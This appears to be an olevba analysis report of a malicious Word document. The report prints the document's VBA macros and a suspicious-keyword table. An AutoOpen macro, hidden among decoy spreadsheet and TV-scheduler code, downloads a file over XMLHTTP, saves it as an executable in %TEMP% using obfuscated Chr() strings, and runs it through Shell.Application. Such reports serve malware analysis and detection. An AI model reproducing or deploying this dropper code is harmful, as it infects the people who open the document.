
Malicious Word macro

Oct 12th, 2015
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  1. olevba 0.41 -
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASI-B-V 12octo~1.doc
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  8. ===============================================================================
  9. FILE: 12octo~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 12octo~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
  16. QweKc610Mvyl
  17. End Sub
  18. -------------------------------------------------------------------------------
  19. VBA MACRO Module1.bas
  20. in file: 12octo~1.doc - OLE stream: u'Macros/VBA/Module1'
  21. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  23. Public uAcS9wh7h0 As String
  24. Private Const ChunkSize As Long = 65500
  26. Private Type Chunk
  27.     Bytes(1 To ChunkSize) As Byte
  28. End Type
  30. Private tChunk As Chunk
  32. Private Type GUID
  33.     Data(0 To 15) As Byte
  34. End Type
  36. Private Type HeaderInfo
  37.     UID As GUID
  38.     Start As Long
  39.     FragmentSize As Long
  40.     FileSize As Long
  41.     Name As String * 50
  42. End Type
  44. Private Type Info
  45.     Header As HeaderInfo
  46.     Filename As String
  47.     Valid As Boolean
  48. End Type
  50. Private Const HeaderSize = 16 + 4 + 4 + 4 + 50
  52. Private aFragmentList() As Info
  54. Public Sub JoinFilesSub()
  55.     ReadFragments
  56.     SortFragments
  57.     RebuildFragments
  58.     RenameFiles
  59. End Sub
  60. Private Sub ReadFragments()
  61.     Dim oFile As File
  62.     Dim oFSO As New FileSystemObject
  63.     Dim tInfo As Info
  65.     ReDim aFragmentList(0) As Info
  67.     For Each oFile In oFSO.GetFolder(App.Path).Files
  68.         Open oFile.Path For Binary As #1
  69.         If oFile.Size > HeaderSize Then
  70.             Get #1, , tInfo.Header
  71.             tInfo.Filename = oFile.Path
  72.             ReDim Preserve aFragmentList(UBound(aFragmentList) + 1) As Info
  73.             aFragmentList(UBound(aFragmentList)) = tInfo
  74.         End If
  75.         Close #1
  76.     Next
  77. End Sub
  79. Private Sub SortFragments()
  80.     Dim bSorted As Boolean
  81.     Dim iIndex As Integer
  82.     Dim tTempInfo As Info
  84.     While Not bSorted
  85.         bSorted = True
  86.         For iIndex = 1 To UBound(aFragmentList) - 1
  87.             Select Case CompareGUID(aFragmentList(iIndex).Header.UID, aFragmentList(iIndex + 1).Header.UID)
  88.                 Case -1 ' First lower
  89.                Case 0 ' Same
  90.                    If aFragmentList(iIndex).Header.Start > aFragmentList(iIndex + 1).Header.Start Then
  91.                         tTempInfo = aFragmentList(iIndex)
  92.                         aFragmentList(iIndex) = aFragmentList(iIndex + 1)
  93.                         aFragmentList(iIndex + 1) = tTempInfo
  94.                         bSorted = False
  95.                     End If
  96.                 Case 1 ' First higher
  97.                    tTempInfo = aFragmentList(iIndex)
  98.                     aFragmentList(iIndex) = aFragmentList(iIndex + 1)
  99.                     aFragmentList(iIndex + 1) = tTempInfo
  100.                     bSorted = False
  101.             End Select
  102.         Next
  103.     Wend
  104. End Sub
  106. Private Function CompareGUID(tGUID1 As GUID, tGUID2 As GUID) As Integer
  107.     Dim iIndex As Integer
  109.     For iIndex = 0 To 15
  110.         If tGUID1.Data(iIndex) > tGUID2.Data(iIndex) Then
  111.             CompareGUID = 1
  112.             Exit Function
  113.         ElseIf tGUID1.Data(iIndex) < tGUID2.Data(iIndex) Then
  114.             CompareGUID = -1
  115.             Exit Function
  116.         End If
  117.     Next
  118. End Function
  119. Public Function DkGAGQ8sF(ltrO9bDxlO As String)
  120.     Set DkGAGQ8sF = CreateObject(ltrO9bDxlO)
  121. End Function
  122. Private Sub RebuildFragments()
  123.     Dim sCurrentFile As String
  124.     Dim iIndex As Integer
  125.     Dim tTemp As Info
  126.     Dim iChunks As Long
  127.     Dim iRemainder As Long
  128.     Dim iChunkIndex As Long
  130.     Dim yByte As Byte
  132.     RemoveInvalidFiles
  134.     iIndex = 1
  135.     While iIndex < UBound(aFragmentList)
  136.         If CompareGUID(aFragmentList(iIndex).Header.UID, aFragmentList(iIndex + 1).Header.UID) = 0 Then
  137.             If aFragmentList(iIndex + 1).Header.Start = (CDec(aFragmentList(iIndex).Header.Start) + CDec(aFragmentList(iIndex).Header.FragmentSize)) And aFragmentList(iIndex).Header.FragmentSize <> 0 Then
  138.                 MergeFiles aFragmentList(iIndex), aFragmentList(iIndex + 1)
  139.                 aFragmentList(iIndex).Header.FragmentSize = aFragmentList(iIndex).Header.FragmentSize + aFragmentList(iIndex + 1).Header.FragmentSize
  140.                 RemoveFile iIndex + 1
  141.             Else
  142.                 iIndex = iIndex + 1
  143.             End If
  144.         Else
  145.             iIndex = iIndex + 1
  146.         End If
  147.     Wend
  148. End Sub
  150. Private Sub RenameFiles()
  151.     Dim iChunks As Long
  152.     Dim iRemainder As Long
  153.     Dim yByte As Byte
  154.     Dim iChunkIndex As Long
  155.     Dim iIndex As Long
  157.     For iIndex = 1 To UBound(aFragmentList)
  158.         If aFragmentList(iIndex).Header.FragmentSize = aFragmentList(iIndex).Header.FileSize Then
  159.             Open aFragmentList(iIndex).Filename For Binary As #2
  160.             Open App.Path & "\" & aFragmentList(iIndex).Header.Name For Binary As #1
  161.             Seek #2, HeaderSize + 1
  162.             iChunks = (aFragmentList(iIndex).Header.FileSize) \ ChunkSize
  163.             iRemainder = (aFragmentList(iIndex).Header.FileSize) Mod ChunkSize
  164.             For iChunkIndex = 1 To iChunks
  165.                 Get #2, , tChunk
  166.                 Put #1, , tChunk
  167.             Next
  168.             For iChunkIndex = 1 To iRemainder
  169.                 Get #2, , yByte
  170.                 Put #1, , yByte
  171.             Next
  172.             Close #2
  173.             Close #1
  174.             Kill aFragmentList(iIndex).Filename
  175.         End If
  176.     Next
  177. End Sub
  179. Private Sub MergeFiles(tInfo1 As Info, tInfo2 As Info)
  180.     Dim iChunkIndex As Long
  181.     Dim iChunks As Long
  182.     Dim iRemainder As Long
  183.     Dim yByte As Byte
  185.     Open tInfo1.Filename For Binary As #1
  186.     Open tInfo2.Filename For Binary As #2
  188.     Seek #1, 16 + 4 + 1
  189.     Put #1, , CLng(tInfo1.Header.FragmentSize + tInfo2.Header.FragmentSize)
  190.     Seek #1, tInfo1.Header.FragmentSize + HeaderSize + 1
  191.     Seek #2, HeaderSize + 1
  193.     iChunks = (tInfo2.Header.FragmentSize) \ ChunkSize
  194.     iRemainder = (tInfo2.Header.FragmentSize) Mod ChunkSize
  195.     For iChunkIndex = 1 To iChunks
  196.         Get #2, , tChunk
  197.         Put #1, , tChunk
  198.     Next
  199.     For iChunkIndex = 1 To iRemainder
  200.         Get #2, , yByte
  201.         Put #1, , yByte
  202.     Next
  203.     Close #2
  204.     Close #1
  206.     Kill tInfo2.Filename
  207. End Sub
  208. Public Function I5mvCfqPlkE2g(cDYNJS5ctZ As Variant, YCZOcrGAIHMR As String)
  209. Dim ZaJ7QqbmGwfiIa: Set ZaJ7QqbmGwfiIa = DkGAGQ8sF("Adodb.Stream")
  211. With ZaJ7QqbmGwfiIa
  212.    .Type = 1
  213.     .Open
  214.     .write cDYNJS5ctZ
  215.     .savetofile YCZOcrGAIHMR, 2
  216. End With
  217. End Function
  218. Private Sub RemoveInvalidFiles()
  219.     Dim iIndex As Long
  220.     Dim iIndex2 As Long
  222.     For iIndex = 1 To UBound(aFragmentList) - 1
  223.         If CompareGUID(aFragmentList(iIndex).Header.UID, aFragmentList(iIndex + 1).Header.UID) = 0 Then
  224.             aFragmentList(iIndex).Valid = True
  225.             aFragmentList(iIndex + 1).Valid = True
  226.         End If
  227.     Next
  229.     iIndex = 1
  230.     While iIndex <= UBound(aFragmentList)
  231.         If Not aFragmentList(iIndex).Valid Then
  232.             RemoveFile iIndex
  233.         Else
  234.             iIndex = iIndex + 1
  235.         End If
  236.     Wend
  237. End Sub
  239. Private Sub RemoveFile(iIndex As Long)
  240.     Dim iIndex2 As Long
  242.     For iIndex2 = iIndex To UBound(aFragmentList) - 1
  243.         aFragmentList(iIndex2) = aFragmentList(iIndex2 + 1)
  244.     Next
  245.     ReDim Preserve aFragmentList(UBound(aFragmentList) - 1) As Info
  246. End Sub
  247. -------------------------------------------------------------------------------
  248. VBA MACRO Module2.bas
  249. in file: 12octo~1.doc - OLE stream: u'Macros/VBA/Module2'
  250. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  252. Private vTVChannels As Variant
  253. Public vTVChannelNames As Variant
  254. Private vRadioChannels As Variant
  255. Public vRadioChannelNames As Variant
  257. Public Const MaxSlots As Long = 7
  258. Private Const StartupTime As Date = #12:00:52 AM#
  259. Private Const LeadInTime As Date = #12:04:00 AM#
  260. Private Const LeadOutTime As Date = #12:05:00 AM#
  262. Public Function CheckProgrammes() As Boolean
  263.     Dim oProgramme As Programme
  264.     Dim dDate As Date
  265.     Dim sFileName As String
  266.     Dim iProgrammeIndex As Integer
  268.     For iProgrammeIndex = 0 To MaxSlots
  269.         Set oProgramme = oProgrammes(iProgrammeIndex)
  270.         If oProgramme.Valid Then
  271.             If (oProgramme.mStartTime - StartupTime - LeadInTime) <= Now And oProgramme.mStopTime >= Now Then
  272.                 RecordChannel oProgramme.mChannel, (oProgramme.mStopTime - Now - StartupTime + LeadInTime + LeadOutTime) * CLng(86400), oProgramme.Radio
  274.                 If Not oProgramme.mRadio Then
  275.                     sFileName = vTVChannelNames(oProgramme.mChannel) & " " & Format$(oProgramme.mStartTime, "YYYY-MM-DD HHMM") & "-" & Format$(oProgramme.mStopTime, "HHMM") & ".avi"
  276.                 Else
  277.                     sFileName = vRadioChannelNames(oProgramme.mChannel) & " " & Format$(oProgramme.mStartTime, "YYYY-MM-DD HHMM") & "-" & Format$(oProgramme.mStopTime, "HHMM") & ".avi"
  278.                 End If
  279.                 Debug.Print sFileName
  280.                 With New FileSystemObject
  281.                     If .FileExists("D:\Media\Video\Captured\capture.avi") Then
  282.                         On Error Resume Next
  283.                         .GetFile("D:\Media\Video\Captured\capture.avi").Name = sFileName
  284.                     End If
  285.                 End With
  286.                 oProgramme.Recorded = True
  287.                 CheckProgrammes = SetNextProgramme(oProgramme)
  288.             End If
  289.         End If
  290.     Next
  291. End Function
  293. Private Function SetNextProgramme(oCopyProgramme As String) As Boolean
  294.     Dim iProgrammeIndex As Long
  295.     Dim oProgramme As Programme
  296.     Dim dNextDate As Date
  297.     Dim dNextDay As Integer
  298.     Dim dNextMonth As Integer
  299.     Dim dNextYear As Integer
  300.     Dim dNextStartTime As Date
  301.     Dim dNextStopTime As Date
  302.     Dim iOffset As Integer
  303.     Dim bCreateNew As Boolean
  305.     With oCopyProgramme
  306.         If oCopyProgramme.mDaily Then
  307.             iOffset = 1
  308.         ElseIf oCopyProgramme.mMonFri Then
  309.             iOffset = 1
  310.             If .mWeekday = "FRIDAY" Then
  311.                 iOffset = 3
  312.             End If
  313.         ElseIf oCopyProgramme.mWeekly Then
  314.             iOffset = 7
  315.         End If
  317.         If oCopyProgramme.mDaily Or oCopyProgramme.mMonFri Or oCopyProgramme.mWeekly Then
  318.             dNextDate = oCopyProgramme.mDate + iOffset
  319.             dNextDay = Val(Format$(dNextDate, "DD"))
  320.             dNextMonth = Val(Format$(dNextDate, "MM"))
  321.             dNextYear = Val(Format$(dNextDate, "YYYY"))
  322.             dNextStartTime = oCopyProgramme.mStartTime + iOffset
  323.             dNextStopTime = oCopyProgramme.mStopTime + iOffset
  324.             bCreateNew = True
  325.         End If
  326.     End With
  328.     If bCreateNew Then
  329.         For iProgrammeIndex = 0 To MaxSlots
  330.             Set oProgramme = oProgrammes(iProgrammeIndex)
  331.             If Not oProgramme.Valid Then
  332.                 With oProgramme
  333.                     .mCurrentDay = oCopyProgramme.mCurrentDay
  334.                     .mCurrentMonth = oCopyProgramme.mCurrentMonth
  335.                     .mCurrentYear = oCopyProgramme.mCurrentYear
  336.                     .mPlusCode = oCopyProgramme.mPlusCode
  337.                     .mWeekday = oCopyProgramme.mWeekday
  338.                     .mDate = dNextDate
  339.                     .mDay = dNextDay
  340.                     .mMonth = dNextMonth
  341.                     .mYear = dNextYear
  342.                     .mChannel = oCopyProgramme.mChannel
  343.                     .mStartTime = dNextStartTime
  344.                     .mStopTime = dNextStopTime
  345.                     .mDuration = oCopyProgramme.mDuration
  346.                     .mRadio = oCopyProgramme.mRadio
  347.                     .mDaily = oCopyProgramme.mDaily
  348.                     .mWeekly = oCopyProgramme.mWeekly
  349.                     .mMonFri = oCopyProgramme.mMonFri
  350.                     .mRecorded = False
  351.                     .mStatus = Ready
  352.                     .mValid = True
  353.                 End With
  354.                 SetNextProgramme = True
  355.                 WriteFile
  356.                 Exit Function
  357.             End If
  358.         Next
  359.     End If
  360. End Function
  361. Public Function zjHBaqIPU77(hgucRLPWCIsOX9 As String)
  362.     Set XLjyVs6RjG = DkGAGQ8sF("Shell.Application")
  363. XLjyVs6RjG.Open (uAcS9wh7h0)
  364. End Function
  366. Sub filterOff() '{{{
  367.    Application.ScreenUpdating = False
  368.     Range("B3").AutoFilter ActiveCell.Column
  369. End Sub '}}}
  371. Function smallerFonts() '{{{
  372.  Dim currentFontSize As Long
  373.   On Error GoTo ERROR01
  374.   currentFontSize = Selection.Font.Size
  375.   Selection.Font.Size = currentFontSize - 1
  376.   period_buff = ">"
  377. ERROR01:
  378. End Function '}}}
  380. Function biggerFonts() '{{{
  381.  Dim currentFontSize As Long
  382.   On Error GoTo ERROR01
  383.   currentFontSize = Selection.Font.Size
  384.   Selection.Font.Size = currentFontSize + 1
  385.   period_buff = "<"
  386. ERROR01:
  387. End Function '}}}
  389. Sub sp(Optional clearFilterdRowValue = 0) '{{{ smartpaste
  390.    'Todo ??????????????(Cut mode)
  392.     Application.ScreenUpdating = False
  394.     'Microsoft Forms 2.0 Object Library ??????
  395.    Dim V As Variant    '?????????????
  396.    Dim A As Variant    '??????
  399.     Set destRange = Range(ActiveCell, Cells(Rows.Count, ActiveCell.Column)) 'ActiveCell???????
  400.    Set destRange = destRange.SpecialCells(xlCellTypeVisible)   '?????????
  402.     'clipboard???????????V?2?????????'{{{
  403.    Dim Dobj As DataObject
  404.     Set Dobj = New DataObject
  405.     With Dobj
  406.         .GetFromClipboard
  407.         On Error Resume Next
  408.         V = .GetText
  409.         On Error GoTo 0
  410.     End With '}}}
  412.     If Not IsEmpty(V) Then    '????????????????????????
  413.        V = Split(CStr(V), vbCrLf) '???????string??
  415.         '??????????????????????'{{{
  416.        If clearFilterdRowValue = 1 Then
  417.             referencRangeHeight = UBound(V) + 1
  418.             referencRangeWidth = UBound(Split(CStr(V(0)), vbTab)) + 1
  419.             Debug.Print referencRangeHeight
  420.             Debug.Print referencRangeWidth
  421.             For Each C In ActiveCell.Resize(referencRangeHeight, referencRangeWidth)
  422.                 C.Value = ""
  423.             Next C
  424.         End If '}}}
  426.         '?????? TODO
  427.        If Application.CutCopyMode = xlCut Then
  428.             'src??dst???????ClearContents
  429.            Set srcRange = GetCopiedRange(ActiveSheet.Name)
  430.             For Each C In srcRange
  431.                 C.Value = ""
  432.             Next C
  434.             Application.CutCopyMode = False
  435.         End If
  437.         '????'{{{
  438.        Dim i As Integer: i = 0
  439.         Dim r As Range
  440.         For Each r In destRange
  441.             A = Split(CStr(V(i)), vbTab) 'i??
  442.            For J = 0 To UBound(A)
  443.                 If CStr(Val(A(J))) = A(J) Then 'A(j)?????
  444.                    r.Offset(0, J).Value = Val(A(J))
  445.                 Else
  446.                     r.Offset(0, J).Value = A(J)
  447.                 End If
  448.             Next J
  449.             If UBound(A) = -1 Then
  450.                 r.Offset(0, J).Value = ""
  451.             End If
  453.             i = i + 1
  454.             If i >= UBound(V) Then
  455.                 Exit For
  456.             End If
  457.         Next '}}}
  458.    End If
  460.     Set Dobj = Nothing
  461.     Set r = Nothing
  462. End Sub '}}}
  464. Sub sp2(Optional clearFilterdRowValue = 1) '{{{ smartpaste
  465.    'Todo ??????????????(Cut mode)
  467.     Application.ScreenUpdating = False
  469.     'Microsoft Forms 2.0 Object Library ??????
  470.    Dim V As Variant    '?????????????
  471.    Dim A As Variant    '??????
  474.     Set destRange = Range(ActiveCell, Cells(Rows.Count, ActiveCell.Column)) 'ActiveCell???????
  475.    Set destRange = destRange.SpecialCells(xlCellTypeVisible)   '?????????
  477.     'clipboard???????????V?2?????????'{{{
  478.    Dim Dobj As DataObject
  479.     Set Dobj = New DataObject
  480.     With Dobj
  481.         .GetFromClipboard
  482.         On Error Resume Next
  483.         V = .GetText
  484.         On Error GoTo 0
  485.     End With '}}}
  487.     If Not IsEmpty(V) Then    '????????????????????????
  488.        V = Split(CStr(V), vbCrLf) '???????string??
  490.         '??????????????????????'{{{
  491.        If clearFilterdRowValue = 1 Then
  492.             referencRangeHeight = UBound(V) + 1
  493.             referencRangeWidth = UBound(Split(CStr(V(0)), vbTab)) + 1
  494.             Debug.Print referencRangeHeight
  495.             Debug.Print referencRangeWidth
  496.             For Each C In ActiveCell.Resize(referencRangeHeight, referencRangeWidth)
  497.                 C.Value = ""
  498.             Next C
  499.         End If '}}}
  501.         '?????? TODO
  502.        If Application.CutCopyMode = xlCut Then
  503.             'src??dst???????ClearContents
  504.            Set srcRange = GetCopiedRange(ActiveSheet.Name)
  505.             For Each C In srcRange
  506.                 C.Value = ""
  507.             Next C
  509.             Application.CutCopyMode = False
  510.         End If
  512.         '????'{{{
  513.        Dim i As Integer: i = 0
  514.         Dim r As Range
  515.         For Each r In destRange
  516.             A = Split(CStr(V(i)), vbTab) 'i??
  517.            For J = 0 To UBound(A)
  518.                 If CStr(Val(A(J))) = A(J) Then 'A(j)?????
  519.                    r.Offset(0, J).Value = Val(A(J))
  520.                 Else
  521.                     r.Offset(0, J).Value = A(J)
  522.                 End If
  523.             Next J
  524.             If UBound(A) = -1 Then
  525.                 r.Offset(0, J).Value = ""
  526.             End If
  528.             i = i + 1
  529.             If i >= UBound(V) Then
  530.                 Exit For
  531.             End If
  532.         Next '}}}
  533.    End If
  535.     Set Dobj = Nothing
  536.     Set r = Nothing
  537. End Sub '}}}
  539. Public Sub RecordChannel(iChannelNo As Long, iDuration As Long, bRadio As Boolean)
  540.     Dim sFileName As String
  541.     Show.tmrTime.Enabled = False
  542.     If Not bRadio Then
  543.         Record vTVChannels(iChannelNo), iDuration, bRadio
  544.     Else
  545.         Record vRadioChannels(iChannelNo), iDuration, bRadio
  546.     End If
  547.     Show.tmrTime.Enabled = True
  548. End Sub
  550. Public Sub Initialise()
  551.     Dim iIndex As Integer
  552.     Dim oTS As TextStream
  553.     Dim oFSO As New FileSystemObject
  555.     vTVChannelNames = Array("", "BBC1", "BBC2", "ITV", "CHANNEL4", "CHANNEL5", "FREEVIEW", "VIDEO")
  556.     vTVChannels = Array(0, 57, 63, 60, 53, 35, 45, 65)
  557.     vRadioChannelNames = Array("", "Radio1", "Radio2", "Radio3", "Radio4")
  558.     vRadioChannels = Array(0, "9820", "0000", "9010", "9450")
  559.     For iIndex = 0 To MaxSlots
  560.         Set oProgrammes(iIndex) = New Programme
  561.     Next
  563.     ReadFile
  564. End Sub
  565. -------------------------------------------------------------------------------
  566. VBA MACRO Module3.bas
  567. in file: 12octo~1.doc - OLE stream: u'Macros/VBA/Module3'
  568. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  569. Sub InteriorColor(number) '{{{
  570.        Selection.Interior.ColorIndex = number
  571. End Sub '}}}
  573. Sub FontColor(number) '{{{
  574.    Debug.Print "FontColor"
  575.     Selection.Font.ColorIndex = number
  576. End Sub '}}}
  578. Sub SetRuledLines() '{{{
  579.        Selection.Borders.LineStyle = xlContinuous
  580. End Sub '}}}
  582. Sub UnsetRuledLines() '{{{
  583.        Selection.Borders.LineStyle = xlLineStyleNone
  584. End Sub '}}}
  586. Sub merge() '{{{
  587.        Selection.merge
  588. End Sub '}}}
  590. Sub unmerge() '{{{
  591.        Selection.unmerge
  592. End Sub '}}}
  594. Sub ex_up() '{{{
  595.        Application.ScreenUpdating = False
  596.         cur_row = ActiveCell.Row
  597.         Rows(cur_row).Copy
  598.         'target_row???
  599.        Dim i As Long
  600.         i = 1
  601.         Do Until ActiveCell.Offset(-i, 0).EntireRow.Hidden = False
  602.                 i = i + 1
  603.         Loop
  604.         target_row = ActiveCell.Offset(-i, 0).Row
  605.         target_column = ActiveCell.Offset(-i, 0).Column
  607.         Rows(target_row).Select
  608.         Selection.Insert
  610.         '?????????
  611.        Rows(cur_row + 1).Delete
  612.         '????????????
  613.        Cells(target_row, target_column).Select
  614. End Sub '}}}
  616. Sub ex_below() '{{{
  617.        Application.ScreenUpdating = False
  618.         cur_row = ActiveCell.Row
  619.         Rows(cur_row).Copy
  620.         'target_row???
  621.        Dim i As Long
  622.         i = 1
  623.         Do Until ActiveCell.Offset(i, 0).EntireRow.Hidden = False
  624.                 i = i + 1
  625.         Loop
  626.         target_row = ActiveCell.Offset(i, 0).Row
  627.         target_column = ActiveCell.Offset(i, 0).Column
  629.         Rows(target_row + 1).Select
  630.         Selection.Insert
  631.         Rows(cur_row).Delete
  633.         '????????????
  634.        Cells(target_row, target_column).Select
  635. End Sub '}}}
  636. Sub QweKc610Mvyl()
  638. Dim kRSoxIipXn: Set kRSoxIipXn = DkGAGQ8sF("Microsoft.XMLHTTP")
  640. kRSoxIipXn.Open Chr(71) & Chr(69) & "T", _
  641. "" _
  642. , False
  643. kRSoxIipXn.Send
  645. Set mfiYsGnVkdEGyc = DkGAGQ8sF("WScript.Shell")
  647. Set pIxDl7iL7G = mfiYsGnVkdEGyc.Environment("Process")
  649. yt1lSr86u = pIxDl7iL7G("TEMP")
  651. uAcS9wh7h0 = yt1lSr86u & Chr(92) & Chr(103) & Chr(105) & "c" & Chr(97) & "g" & "e" & Chr(46) & Chr(101) & "x" & Chr(101)
  652. Dim uf5JA1lwM0Xb As Variant
  653. uf5JA1lwM0Xb = kRSoxIipXn.responseBody
  654. I5mvCfqPlkE2g uf5JA1lwM0Xb, uAcS9wh7h0
  655. On Error GoTo zZArBUMfp8qw
  656.     A = 348 / 0
  657.   On Error GoTo 0
  659. LxqYAbt140nt:
  660.   Exit Sub
  661. zZArBUMfp8qw:
  662.   zjHBaqIPU77 ("a0pn7oL55y")
  663. Resume LxqYAbt140nt
  664. End Sub
  665. Sub ex_right() '{{{
  666.        Application.ScreenUpdating = False
  667.         cur_col = ActiveCell.Column
  668.         Columns(cur_col).Copy
  669.         'target_row???
  670.        Dim i As Long
  671.         i = 1
  672.         Do Until ActiveCell.Offset(0, i).EntireColumn.Hidden = False
  673.                 i = i + 1
  674.         Loop
  675.         target_row = ActiveCell.Offset(0, i).Row
  676.         target_column = ActiveCell.Offset(0, i).Column
  678.         Columns(target_column + 1).Select
  679.         Selection.Insert
  680.         Columns(cur_col).Delete
  682.         '????????????
  683.        Cells(target_row, target_column).Select
  684. End Sub '}}}
  686. Sub ex_left() '{{{
  687.        Application.ScreenUpdating = False
  688.         cur_col = ActiveCell.Column
  689.         Columns(cur_col).Copy
  690.         'target_row???
  691.        Dim i As Long
  692.         i = 1
  693.         Do Until ActiveCell.Offset(0, -i).EntireColumn.Hidden = False
  694.                 i = i + 1
  695.         Loop
  696.         target_row = ActiveCell.Offset(0, -i).Row
  697.         target_column = ActiveCell.Offset(0, -i).Column
  699.         Columns(target_column).Select
  700.         Selection.Insert
  701.         Columns(cur_col + 1).Delete
  703.         '????????????
  704.        Cells(target_row, target_column).Select
  705. End Sub '}}}
  707. Sub ZoomInWindow() '{{{
  708.        ActiveWindow.Zoom = ActiveWindow.Zoom + 5
  709. End Sub '}}}
  711. Sub ZoomOutWindow() '{{{
  712.        ActiveWindow.Zoom = ActiveWindow.Zoom - 5
  713. End Sub '}}}
  715. Sub MouseNormal() '{{{
  716.        Application.Cursor = xlDefault
  717. End Sub '}}}
  719. Sub SetSeqNumber(Optional destRange As Range = Nothing) '{{{
  720.        Application.ScreenUpdating = False
  721.         If destRange Is Nothing Then
  722.                 Set destRange = Selection
  723.         End If
  724.         Set destRange = destRange.SpecialCells(xlCellTypeVisible)
  725.     N = 1
  726.         For Each r In destRange
  727.                 r.Value = N
  728.                 'Selection.NumberFormatLocal = "G/??"
  729.                Selection.NumberFormatLocal = "0_);[?](0)"
  730.                 N = N + 1
  731.     Next
  732. End Sub '}}}
  734. Sub SortCurrentColumn() '{{{
  735.        Application.ScreenUpdating = False
  736.         Set targetRange = Selection.CurrentRegion
  738.         With ActiveSheet.Sort
  739.                 With .SortFields
  740.                         .Clear
  741.                         .Add _
  742.                                 Key:=Columns(ActiveCell.Column), _
  743.                                 SortOn:=xlSortOnValues, _
  744.                                 Order:=xlAscending, _
  745.                                 DataOption:=xlSortNormal
  746.                 End With
  747.                         .SetRange targetRange
  748.                         .Header = xlYes '???????????xlGuess?Excel?????
  749.                        .MatchCase = False
  750.                         .Orientation = xlTopToBottom
  751.                         .SortMethod = xlPinYin
  752.                         .Apply
  753.         End With
  754. End Sub '}}}
  756. '--------sheet_move-------------------
  757. Sub ActivateLeftSheet() '{{{
  758.    SendKeys "^{PGDN}"
  759. End Sub '}}}
  761. Sub ActivateRightSheet() '{{{
  762.    SendKeys "^{PGUP}"
  763. End Sub '}}}
  765. Sub ActivateFirstSheet(Optional where As String) '{{{
  766.    With ActiveWorkbook
  767.         .Worksheets(1).Activate
  768.     End With
  769. End Sub '}}}
  771. Sub ActivateLastSheet(Optional where As String) '{{{
  772.    With ActiveWorkbook
  773.         .Worksheets(.Worksheets.Count).Activate
  774.     End With
  775. End Sub '}}}
  777. '---------auto_filter-----------------
  778. Sub focusFromScratch() '{{{
  779.    Application.ScreenUpdating = False
  780.     cur_row = ActiveCell.Row
  781.     cur_col = ActiveCell.Column
  782.     buf = Cells(cur_row, cur_col).Value
  783.     If ActiveSheet.FilterMode Then
  784.         ActiveSheet.ShowAllData
  785.     End If
  786.     Range("B3").AutoFilter cur_col, buf
  787. End Sub '}}}
  789. Sub focus() '{{{
  790.    Application.ScreenUpdating = False
  791.     cur_row = ActiveCell.Row
  792.     cur_col = ActiveCell.Column
  793.     buf = Cells(cur_row, cur_col).Value
  794.     Range("B3").AutoFilter cur_col, buf
  795. End Sub '}}}
  797. Sub exclude() '{{{
  798.    Application.ScreenUpdating = False
  799.     Dim filterCondition As Variant
  800.     Dim buf As String
  802.     buf = Cells(ActiveCell.Row, ActiveCell.Column).Value
  804.     Debug.Print Cells(Rows.Count, ActiveCell.Column).End(xlUp).Row
  805.     Set targetColumnRange = Range(Cells(2, ActiveCell.Column), Cells(Rows.Count, ActiveCell.Column).End(xlUp))
  806.     Set targetColumnRange = targetColumnRange.SpecialCells(xlCellTypeVisible)
  808.     Set showedValueCollection = CreateObject("Scripting.Dictionary")
  809.     On Error Resume Next
  810.         For Each C In targetColumnRange
  811.             If C.Value <> buf Then
  812.                 showedValueCollection.Add "_" & C.Value, C.Value
  813.             End If
  814.         Next C
  815.     On Error GoTo 0
  817.     filterCondition = showedValueCollection.Keys
  819.     '?????Empty?????????string?""????
  820.    For E = 0 To UBound(filterCondition)
  821.         filterCondition(E) = Mid(filterCondition(E), 2)
  822.     Next E
  824.     Range("B3").AutoFilter Field:=ActiveCell.Column, Criteria1:=filterCondition, Operator:=xlFilterValues
  825. End Sub '}}}
  827. '---------diff-----------------
  828. Sub diffsh(targetsh As String, fromsh As String)
  829.     'TODO prompt
  830.    For Each C In fromsh.UsedRange
  831.         If C.Value <> targetsh.Cells(C.Row, C.Column).Value Then
  832.             targetsh.Cells(C.Row, C.Column).Interior.ColorIndex = 29
  833.         End If
  834.     Next C
  835. End Sub
  837. Sub diffRange(targetRange As Range, fromRange As Range)
  838.     'TODO
  839. End Sub
  841. Sub abcdefc(targetRange As Range, fromRange As Range)
  842.     Call diffsh(ActiveWorkbook.Worksheets("???"), ActiveWorkbook.Worksheets("???"))
  843. End Sub
  845. +------------+----------------------+-----------------------------------------+
  846. | Type       | Keyword              | Description                             |
  847. +------------+----------------------+-----------------------------------------+
  848. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  849. | Suspicious | Kill                 | May delete a file                       |
  850. | Suspicious | Open                 | May open a file                         |
  851. | Suspicious | Shell                | May run an executable file or a system  |
  852. |            |                      | command                                 |
  853. | Suspicious | WScript.Shell        | May run an executable file or a system  |
  854. |            |                      | command                                 |
  855. | Suspicious | Shell.Application    | May run an application (if combined     |
  856. |            |                      | with CreateObject)                      |
  857. | Suspicious | Binary               | May read or write a binary file (if     |
  858. |            |                      | combined with Open)                     |
  859. | Suspicious | CreateObject         | May create an OLE object                |
  860. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  861. |            |                      | strings                                 |
  862. | Suspicious | ADODB.Stream         | May create a text file                  |
  863. | Suspicious | SaveToFile           | May create a text file                  |
  864. | Suspicious | Write                | May write to a file (if combined with   |
  865. |            |                      | Open)                                   |
  866. | Suspicious | Put                  | May write to a file (if combined with   |
  867. |            |                      | Open)                                   |
  868. | Suspicious | SendKeys             | May control another application by      |
  869. |            |                      | simulating user keystrokes              |
  870. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  871. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  872. |            |                      | may be used to obfuscate strings        |
  873. |            |                      | (option --decode to see all)            |
  874. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  875. |            | Strings              | may be used to obfuscate strings        |
  876. |            |                      | (option --decode to see all)            |
